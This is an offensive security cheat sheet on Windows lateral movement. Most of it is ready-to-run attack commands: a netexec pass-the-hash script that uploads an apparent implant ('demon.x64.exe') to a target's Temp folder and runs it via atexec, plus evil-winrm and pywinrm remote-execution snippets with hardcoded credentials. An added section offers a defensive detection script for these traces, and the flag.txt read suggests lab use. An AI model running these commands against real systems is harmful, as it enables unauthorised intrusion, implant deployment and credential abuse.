netexec
Upload and execute file on target(s):
#TARGET="topwn.txt"
#TARGET="computers.txt"
TARGET="mx01.target.local"
#TARGET="srv.target.local"
USER="asdf_da"
#USER="users.txt"
#PASSHASH="-p myshittypass"
#PASSHASH="-H \"44444444444444444444444444444444\""
PASSHASH="-H ab7b75ff84475be2e8c4dcb7390955c3:ab7b75ff84475be2e8c4dcb7390955c3"
SOURCE_BIN="/home/kali/webserver/demon.x64.exe" # full path
TARGET_BIN="cmon.exe" # just the bin name and ext
EXEC_METHOD="--exec-method atexec"
#EXEC_METHOD=""
EXTRA=""
#EXTRA="--laps"
#EXTRA="--laps MyLocalAdministrator"
netexec smb $TARGET -u "$USER" $PASSHASH --put-file "$SOURCE_BIN" "\\Windows\\Temp\\$TARGET_BIN" -x "C:\\Windows\\Temp\\$TARGET_BIN" $EXEC_METHOD $EXTRA
WinRm : Enter-PSSession / evil-winrm
ports:
5985 (HTTP) and 5986 (HTTPS) (Below Windows 7: 80 and 443)
# finding open ports
nmap -p5985,5986 -iL computers.txt -Pn -v
# Connect from Linux
evil-winrm -i Server01 -u USER -p PASS
# Connect from Windows
Enter-PSSession Server01
# automation (python3)
# pip install pywinrm # (see ref for optional deps)
# ref: https://pypi.org/project/pywinrm/
import winrm
sess = winrm.Session(
    '10.10.10.10',
    auth=(
        'administrator',
        'badminton'
    ),
    transport='ntlm'
)
# run powershell command (the session object is `sess`; pywinrm returns bytes, so decode for printing)
r = sess.run_ps("whoami")
print(r.std_out.decode())
print(r.std_err.decode())
# run a cmd.exe command (pywinrm's method is run_cmd; the path is a plain Windows path)
print(sess.run_cmd(r"type C:\Users\mike\Desktop\flag.txt").std_out.decode())
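Added example (not part of the original notes): the host-side traces of the two techniques above, a remote PowerShell (WinRM) session spawning a child process and a binary launched from the C:\Windows\Temp drop location used by the netexec line, checked against process-creation events. Assumptions: events are dicts shaped like Sysmon Event ID 1 (Image, ParentImage, ProcessId, User); the sample events are constructed, not real telemetry.

```python
# Added example, not from the original notes. Flags process-creation
# events that carry the traces of the techniques in this cheat sheet.
import ntpath

TEMP_DIR = r"c:\windows\temp"     # drop location used by the --put-file / -x line above
WINRM_HOST = "wsmprovhost.exe"    # host process for remote PowerShell (WinRM) sessions


def classify(event):
    """Return the names of the rules that match one process-creation event."""
    image = event.get("Image", "").lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    hits = []
    # Rule 1: a child process of the WinRM provider host, i.e. a command
    # run through Enter-PSSession / evil-winrm / pywinrm.
    if parent == WINRM_HOST:
        hits.append("winrm_child_process")
    # Rule 2: an executable started from C:\Windows\Temp, as the atexec
    # line above does with its dropped binary.
    if ntpath.dirname(image) == TEMP_DIR:
        hits.append("exec_from_windows_temp")
    return hits


def scan(events):
    """Map each matching event's ProcessId to the rules that fired."""
    findings = {}
    for event in events:
        rules = classify(event)
        if rules:
            findings[event["ProcessId"]] = rules
    return findings


# Constructed sample events (assumed Sysmon-like field names, not real telemetry).
SAMPLE_EVENTS = [
    {"ProcessId": 1001, "Image": r"C:\Windows\System32\whoami.exe",
     "ParentImage": r"C:\Windows\System32\wsmprovhost.exe", "User": r"TARGET\asdf_da"},
    {"ProcessId": 1002, "Image": r"C:\Windows\Temp\cmon.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"ProcessId": 1003, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"TARGET\alice"},
]

if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(rules))
```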
About WinRm
Using the WS-Management protocol, Windows PowerShell remoting lets you run any Windows PowerShell command on one or more remote computers.
To start an interactive session with a single remote computer, use the Enter-PSSession cmdlet. For example, to start an interactive session with the Server01 remote computer, type:
Enter-PSSession Server01
~ Microsoft Docs [1]
Microsoft has implemented the WS-Management standard in Windows Remote Management 1.1 (WinRM).
By default WinRM HTTP uses port 80 and HTTPS uses port 443. On Windows 7 and higher the default ports are 5985 and 5986, respectively.
~ Wikipedia [2]